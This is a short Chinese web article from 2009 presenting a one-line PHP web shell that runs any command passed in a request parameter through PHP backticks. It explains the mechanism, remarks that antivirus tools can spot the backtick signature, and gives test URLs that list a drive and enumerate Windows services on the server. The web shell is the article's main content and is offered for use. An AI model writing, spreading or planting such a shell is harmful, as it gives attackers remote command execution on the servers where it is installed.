PHP安全: 一个新型的php一句话cmdshell

互联网 2009年02月28日 16:19 查看8274次 作者: skyfire[B.H.S.T]  【
文章分类:PHP技术文档
<?php
echo `$_REQUEST[id]`;
?>

原理:php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,
并返回命令执行的结果(string类型);  

局限性:特征码比较明显,``符号在php中很少用到,杀毒软件很容易以此为特征码扫描到并警报;
``里面不能执行php代码;

测试方式:
http://www.phpv.net/test.php?id=dir%20c
相当于:dir c:

http://www.phpv.net/test.php?id=net%20start
查看已启动的WIN服务

.....



 


责任编辑:抽烟的蚊子

给文章打分...

平均分:0.9(39 次)

-5 -4 -3 -2 -1 0 1 2 3 4 5
9

顶一下

发表我的见解...

  • 您的大名: 留空为匿名
  • 您的主页:
  • 您的邮箱: